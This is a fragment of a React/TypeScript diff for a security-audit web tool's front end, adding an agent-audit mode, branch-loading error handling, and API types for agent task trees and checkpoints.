const canSelectFiles = isRepo || (isZip && useStoredZip && hasStoredZip);
|
||||
|
||||
return (
|
||||
<div className="flex items-center justify-between p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30">
|
||||
<div>
|
||||
<p className="font-mono text-xs uppercase font-bold text-gray-500">
|
||||
Scan Scope
|
||||
</p>
|
||||
<p className="text-sm text-white font-mono mt-1">
|
||||
{selectedFiles
|
||||
? `${selectedFiles.length} files selected`
|
||||
: "All files"}
|
||||
</p>
|
||||
</div>
|
||||
<div className="flex gap-2">
|
||||
{selectedFiles && canSelectFiles && (
|
||||
<Button
|
||||
size="sm"
|
||||
variant="ghost"
|
||||
onClick={() => setSelectedFiles(undefined)}
|
||||
className="h-8 text-xs text-red-400 hover:bg-red-900/30 hover:text-red-300"
|
||||
>
|
||||
Reset
|
||||
</Button>
|
||||
)}
|
||||
<Button
|
||||
size="sm"
|
||||
variant="outline"
|
||||
onClick={() => setShowFileSelection(true)}
|
||||
disabled={!canSelectFiles}
|
||||
className="h-8 text-xs border-gray-700 text-gray-300 hover:bg-gray-800 hover:text-white font-mono disabled:opacity-50"
|
||||
>
|
||||
<FolderOpen className="w-3 h-3 mr-1" />
|
||||
Select Files
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
})()}
|
||||
|
||||
{/* 排除模式 */}
|
||||
<div className="p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30 space-y-3">
|
||||
<div className="flex items-center justify-between">
|
||||
<span className="font-mono text-xs uppercase font-bold text-gray-500">
|
||||
Exclude Patterns
|
||||
</span>
|
||||
<button
|
||||
type="button"
|
||||
onClick={() => setExcludePatterns(DEFAULT_EXCLUDES)}
|
||||
className="text-xs font-mono text-primary hover:text-primary/80"
|
||||
>
|
||||
Reset
|
||||
</button>
|
||||
</div>
|
||||
|
||||
<div className="flex flex-wrap gap-1.5">
|
||||
{excludePatterns.map((p) => (
|
||||
<Badge
|
||||
key={p}
|
||||
variant="secondary"
|
||||
className="bg-gray-800 text-gray-300 border-0 font-mono text-xs cursor-pointer hover:bg-red-900/50 hover:text-red-400"
|
||||
onClick={() => setExcludePatterns((prev) => prev.filter((x) => x !== p))}
|
||||
>
|
||||
{p} ×
|
||||
</Badge>
|
||||
))}
|
||||
</div>
|
||||
|
||||
<Input
|
||||
placeholder="Add pattern, press Enter..."
|
||||
className="h-8 bg-gray-900/50 border-gray-700 text-white font-mono text-sm placeholder:text-gray-600 focus:ring-0"
|
||||
onKeyDown={(e) => {
|
||||
if (e.key === "Enter" && e.currentTarget.value) {
|
||||
const val = e.currentTarget.value.trim();
|
||||
if (val && !excludePatterns.includes(val)) {
|
||||
setExcludePatterns((prev) => [...prev, val]);
|
||||
}
|
||||
e.currentTarget.value = "";
|
||||
}
|
||||
}}
|
||||
/>
|
||||
</div>
|
||||
</CollapsibleContent>
|
||||
</Collapsible>
|
||||
</div>
|
||||
)}
|
||||
</div>
|
||||
|
||||
{/* Footer */}
|
||||
<div className="flex-shrink-0 flex justify-end gap-3 px-5 py-4 bg-gray-900/50 border-t border-gray-800">
|
||||
<Button
|
||||
variant="ghost"
|
||||
onClick={() => onOpenChange(false)}
|
||||
disabled={creating}
|
||||
className="px-4 h-10 font-mono text-gray-400 hover:text-white hover:bg-gray-800"
|
||||
>
|
||||
Cancel
|
||||
</Button>
|
||||
<Button
|
||||
onClick={handleCreate}
|
||||
disabled={!canStart || creating}
|
||||
className="px-5 h-10 bg-primary hover:bg-primary/90 text-white font-mono font-bold"
|
||||
>
|
||||
{creating ? (
|
||||
<>
|
||||
<Loader2 className="w-4 h-4 animate-spin mr-2" />
|
||||
Starting...
|
||||
</>
|
||||
) : (
|
||||
<>
|
||||
<Play className="w-4 h-4 mr-2" />
|
||||
Start Audit
|
||||
</>
|
||||
)}
|
||||
</Button>
|
||||
</div>
|
||||
</DialogContent>
|
||||
|
||||
{/* 文件选择对话框 */}
|
||||
<FileSelectionDialog
|
||||
open={showFileSelection}
|
||||
onOpenChange={setShowFileSelection}
|
||||
projectId={selectedProjectId}
|
||||
branch={branch}
|
||||
excludePatterns={excludePatterns}
|
||||
onConfirm={setSelectedFiles}
|
||||
/>
|
||||
</Dialog>
|
||||
);
|
||||
}
|
||||
|
||||
// 项目列表项
|
||||
function ProjectItem({
|
||||
project,
|
||||
selected,
|
||||
onSelect,
|
||||
}: {
|
||||
project: Project;
|
||||
selected: boolean;
|
||||
onSelect: () => void;
|
||||
}) {
|
||||
const isRepo = isRepositoryProject(project);
|
||||
|
||||
return (
|
||||
<div
|
||||
className={`flex items-center gap-3 p-3 cursor-pointer rounded-lg transition-all ${
|
||||
selected
|
||||
? "bg-primary/10 border border-primary/50"
|
||||
: "hover:bg-gray-800/50 border border-transparent"
|
||||
}`}
|
||||
onClick={onSelect}
|
||||
>
|
||||
<div className={`p-1.5 rounded ${isRepo ? "bg-blue-500/20" : "bg-amber-500/20"}`}>
|
||||
{isRepo ? (
|
||||
<Globe className="w-4 h-4 text-blue-400" />
|
||||
) : (
|
||||
<Package className="w-4 h-4 text-amber-400" />
|
||||
)}
|
||||
</div>
|
||||
|
||||
<div className="flex-1 min-w-0">
|
||||
<div className="flex items-center gap-2">
|
||||
<span className={`font-mono text-sm truncate ${selected ? 'text-white font-bold' : 'text-gray-300'}`}>
|
||||
{project.name}
|
||||
</span>
|
||||
<Badge
|
||||
variant="outline"
|
||||
className={`text-[10px] px-1 py-0 font-mono ${
|
||||
isRepo
|
||||
? "border-blue-500/50 text-blue-400"
|
||||
: "border-amber-500/50 text-amber-400"
|
||||
}`}
|
||||
>
|
||||
{isRepo ? "REPO" : "ZIP"}
|
||||
</Badge>
|
||||
</div>
|
||||
{project.description && (
|
||||
<p className="text-xs text-gray-600 mt-0.5 font-mono truncate">
|
||||
{project.description}
|
||||
</p>
|
||||
)}
|
||||
</div>
|
||||
|
||||
{selected && (
|
||||
<div className="w-2 h-2 rounded-full bg-primary animate-pulse" />
|
||||
)}
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
|
@ -30,7 +30,6 @@ import {
|
|||
Upload,
|
||||
FolderOpen,
|
||||
Settings2,
|
||||
Play,
|
||||
Package,
|
||||
Globe,
|
||||
Shield,
|
||||
|
|
@ -111,28 +110,39 @@ export default function CreateTaskDialog({
|
|||
// 加载分支列表
|
||||
useEffect(() => {
|
||||
const loadBranches = async () => {
|
||||
if (!selectedProject || !isRepositoryProject(selectedProject)) {
|
||||
// 使用 selectedProjectId 从 projects 中获取最新的 project 对象
|
||||
const project = projects.find((p) => p.id === selectedProjectId);
|
||||
if (!project || !isRepositoryProject(project)) {
|
||||
setBranches([]);
|
||||
return;
|
||||
}
|
||||
|
||||
setLoadingBranches(true);
|
||||
try {
|
||||
const result = await api.getProjectBranches(selectedProject.id);
|
||||
const result = await api.getProjectBranches(project.id);
|
||||
console.log("[Branch] 加载分支结果:", result);
|
||||
|
||||
if (result.error) {
|
||||
console.warn("[Branch] 加载分支警告:", result.error);
|
||||
toast.error(`加载分支失败: ${result.error}`);
|
||||
}
|
||||
|
||||
setBranches(result.branches);
|
||||
if (result.default_branch) {
|
||||
setBranch(result.default_branch);
|
||||
}
|
||||
} catch (error) {
|
||||
console.error("加载分支失败:", error);
|
||||
setBranches([selectedProject.default_branch || "main"]);
|
||||
const msg = error instanceof Error ? error.message : "未知错误";
|
||||
console.error("[Branch] 加载分支失败:", msg);
|
||||
toast.error(`加载分支失败: ${msg}`);
|
||||
setBranches([project.default_branch || "main"]);
|
||||
} finally {
|
||||
setLoadingBranches(false);
|
||||
}
|
||||
};
|
||||
|
||||
loadBranches();
|
||||
}, [selectedProject?.id]);
|
||||
}, [selectedProjectId, projects]);
|
||||
|
||||
const filteredProjects = useMemo(() => {
|
||||
if (!searchTerm) return projects;
|
||||
|
|
@ -437,45 +447,47 @@ export default function CreateTaskDialog({
|
|||
)}
|
||||
|
||||
{/* 高级选项 */}
|
||||
{/* 规则集和提示词选择 */}
|
||||
<div className="p-3 border-2 border-black bg-purple-50 space-y-3">
|
||||
<div className="flex items-center gap-2 mb-2">
|
||||
<Zap className="w-4 h-4 text-purple-700" />
|
||||
<span className="font-mono text-sm font-bold text-purple-900 uppercase">审计配置</span>
|
||||
</div>
|
||||
<div className="grid grid-cols-2 gap-3">
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">规则集</label>
|
||||
<Select value={selectedRuleSetId} onValueChange={setSelectedRuleSetId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择规则集" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{ruleSets.map((rs) => (
|
||||
<SelectItem key={rs.id} value={rs.id} className="font-mono text-xs">
|
||||
{rs.name} {rs.is_default && '(默认)'} ({rs.enabled_rules_count})
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
{/* 规则集和提示词选择 - 仅快速扫描模式显示 */}
|
||||
{auditMode !== "agent" && (
|
||||
<div className="p-3 border-2 border-black bg-purple-50 space-y-3">
|
||||
<div className="flex items-center gap-2 mb-2">
|
||||
<Zap className="w-4 h-4 text-purple-700" />
|
||||
<span className="font-mono text-sm font-bold text-purple-900 uppercase">审计配置</span>
|
||||
</div>
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">提示词模板</label>
|
||||
<Select value={selectedPromptTemplateId} onValueChange={setSelectedPromptTemplateId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择提示词模板" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{promptTemplates.map((pt) => (
|
||||
<SelectItem key={pt.id} value={pt.id} className="font-mono text-xs">
|
||||
{pt.name} {pt.is_default && '(默认)'}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
<div className="grid grid-cols-2 gap-3">
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">规则集</label>
|
||||
<Select value={selectedRuleSetId} onValueChange={setSelectedRuleSetId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择规则集" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{ruleSets.map((rs) => (
|
||||
<SelectItem key={rs.id} value={rs.id} className="font-mono text-xs">
|
||||
{rs.name} {rs.is_default && '(默认)'} ({rs.enabled_rules_count})
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
</div>
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">提示词模板</label>
|
||||
<Select value={selectedPromptTemplateId} onValueChange={setSelectedPromptTemplateId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择提示词模板" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{promptTemplates.map((pt) => (
|
||||
<SelectItem key={pt.id} value={pt.id} className="font-mono text-xs">
|
||||
{pt.name} {pt.is_default && '(默认)'}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
|
||||
<CollapsibleTrigger className="flex items-center gap-2 text-sm font-mono text-gray-600 hover:text-black transition-colors">
|
||||
|
|
|
|||
|
|
@ -16,7 +16,8 @@ import {
|
|||
Github,
|
||||
UserCircle,
|
||||
Shield,
|
||||
MessageSquare
|
||||
MessageSquare,
|
||||
Bot
|
||||
} from "lucide-react";
|
||||
import routes from "@/app/routes";
|
||||
import { version } from "../../../package.json";
|
||||
|
|
@ -27,6 +28,7 @@ const routeIcons: Record<string, React.ReactNode> = {
|
|||
"/projects": <FolderGit2 className="w-5 h-5" />,
|
||||
"/instant-analysis": <Zap className="w-5 h-5" />,
|
||||
"/audit-tasks": <ListTodo className="w-5 h-5" />,
|
||||
"/agent-audit": <Bot className="w-5 h-5" />,
|
||||
"/audit-rules": <Shield className="w-5 h-5" />,
|
||||
"/prompts": <MessageSquare className="w-5 h-5" />,
|
||||
"/admin": <Settings className="w-5 h-5" />,
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
|
|
@ -26,6 +26,11 @@ export interface AgentTask {
|
|||
verified_count: number;
|
||||
false_positive_count: number;
|
||||
|
||||
// Agent 统计
|
||||
total_iterations: number;
|
||||
tool_calls_count: number;
|
||||
tokens_used: number;
|
||||
|
||||
// 严重程度统计
|
||||
critical_count: number;
|
||||
high_count: number;
|
||||
|
|
@ -34,7 +39,7 @@ export interface AgentTask {
|
|||
|
||||
// 评分
|
||||
quality_score: number;
|
||||
security_score: number;
|
||||
security_score: number | null;
|
||||
|
||||
// 时间
|
||||
created_at: string;
|
||||
|
|
@ -44,6 +49,13 @@ export interface AgentTask {
|
|||
// 进度
|
||||
progress_percentage: number;
|
||||
|
||||
// 配置
|
||||
audit_scope: Record<string, unknown> | null;
|
||||
target_vulnerabilities: string[] | null;
|
||||
verification_level: string | null;
|
||||
exclude_patterns: string[] | null;
|
||||
target_files: string[] | null;
|
||||
|
||||
// 错误信息
|
||||
error_message: string | null;
|
||||
}
|
||||
|
|
@ -307,3 +319,89 @@ export async function* streamAgentEvents(
|
|||
}
|
||||
}
|
||||
|
||||
// ============ Agent Tree Types ============
|
||||
|
||||
export interface AgentTreeNode {
|
||||
id: string;
|
||||
agent_id: string;
|
||||
agent_name: string;
|
||||
agent_type: string;
|
||||
parent_agent_id: string | null;
|
||||
depth: number;
|
||||
task_description: string | null;
|
||||
knowledge_modules: string[] | null;
|
||||
status: "created" | "running" | "completed" | "failed" | "waiting";
|
||||
result_summary: string | null;
|
||||
findings_count: number;
|
||||
iterations: number;
|
||||
tokens_used: number;
|
||||
tool_calls: number;
|
||||
duration_ms: number | null;
|
||||
children: AgentTreeNode[];
|
||||
}
|
||||
|
||||
export interface AgentTreeResponse {
|
||||
task_id: string;
|
||||
root_agent_id: string | null;
|
||||
total_agents: number;
|
||||
running_agents: number;
|
||||
completed_agents: number;
|
||||
failed_agents: number;
|
||||
total_findings: number;
|
||||
nodes: AgentTreeNode[];
|
||||
}
|
||||
|
||||
export interface AgentCheckpoint {
|
||||
id: string;
|
||||
agent_id: string;
|
||||
agent_name: string;
|
||||
agent_type: string;
|
||||
iteration: number;
|
||||
status: string;
|
||||
total_tokens: number;
|
||||
tool_calls: number;
|
||||
findings_count: number;
|
||||
checkpoint_type: "auto" | "manual" | "error" | "final";
|
||||
checkpoint_name: string | null;
|
||||
created_at: string | null;
|
||||
}
|
||||
|
||||
export interface CheckpointDetail extends AgentCheckpoint {
|
||||
task_id: string;
|
||||
parent_agent_id: string | null;
|
||||
state_data: Record<string, unknown>;
|
||||
metadata: Record<string, unknown> | null;
|
||||
}
|
||||
|
||||
// ============ Agent Tree API Functions ============
|
||||
|
||||
/**
|
||||
* 获取任务的 Agent 树结构
|
||||
*/
|
||||
export async function getAgentTree(taskId: string): Promise<AgentTreeResponse> {
|
||||
const response = await apiClient.get(`/agent-tasks/${taskId}/agent-tree`);
|
||||
return response.data;
|
||||
}
|
||||
|
||||
/**
|
||||
* 获取任务的检查点列表
|
||||
*/
|
||||
export async function getAgentCheckpoints(
|
||||
taskId: string,
|
||||
params?: { agent_id?: string; limit?: number }
|
||||
): Promise<AgentCheckpoint[]> {
|
||||
const response = await apiClient.get(`/agent-tasks/${taskId}/checkpoints`, { params });
|
||||
return response.data;
|
||||
}
|
||||
|
||||
/**
|
||||
* 获取检查点详情
|
||||
*/
|
||||
export async function getCheckpointDetail(
|
||||
taskId: string,
|
||||
checkpointId: string
|
||||
): Promise<CheckpointDetail> {
|
||||
const response = await apiClient.get(`/agent-tasks/${taskId}/checkpoints/${checkpointId}`);
|
||||
return response.data;
|
||||
}
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue